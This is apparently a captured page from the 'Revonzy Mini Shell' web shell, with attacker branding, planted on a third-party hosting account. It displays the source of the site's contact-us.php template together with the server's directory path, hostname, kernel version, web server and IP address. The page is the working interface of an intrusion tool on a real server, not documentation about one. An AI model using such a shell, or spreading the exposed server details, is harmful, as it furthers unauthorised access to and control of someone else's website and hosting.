Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/kitchenfoodrecipes.com/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/kitchenfoodrecipes.com/contact-us.php

<?php
	require_once('dt_admin/lib/functions.php');
	$db = new login_function();
?>
<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="<?php echo $ico_icon_path; ?>" type="image/ico">
	<title><?php echo $project_title; ?> - Contact Us</title>
    <meta name="keywords" content="" />
    <meta name="description" content="" />
    <meta name="robots" content="" /> 
	<link rel="stylesheet" type="text/css" href="<?php echo $project_base_url; ?>css/bootstrap.css" />
    <link rel="stylesheet" type="text/css" href="<?php echo $project_base_url; ?>css/web.css" />
</head>
<body>
<?php require_once("header.php"); ?>

<div class="container text-center">
    <div class="row justify-content-center">
  
    <!--Left Section-->
    <div class="col-md-8 col-lg-8 col-sm-12 col-xs-12 first_section">
  
	<!--Blog Post List-->
	<div class="blog_posts">
	
		<div class="breadcrumb">
			<a href="<?php echo $project_base_url; ?>index.php">Home</a> / <a href="<?php echo $project_base_url; ?>contact-us.php">Contact Us</a>
		</div>
	
		<h1 class="blog_title" style="color:#333;">Contact Us</h1>
		<?php
			$cms_id			=	2;
			$db_cms_data	=	$db->get_cms_data_from_cms_id($cms_id);
		?>
		<p class="paragraph_contents"><span class="blank_space"></span><?php echo $db_cms_data; ?></p>	
    </div>
    <!--End Of Blog Post List-->

    </div>
    <!--End Left Section-->

  <?php
    require_once("right-side.php");
  ?>

  </div>
  </div>

<?php
  require_once("footer.php");
?>

</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4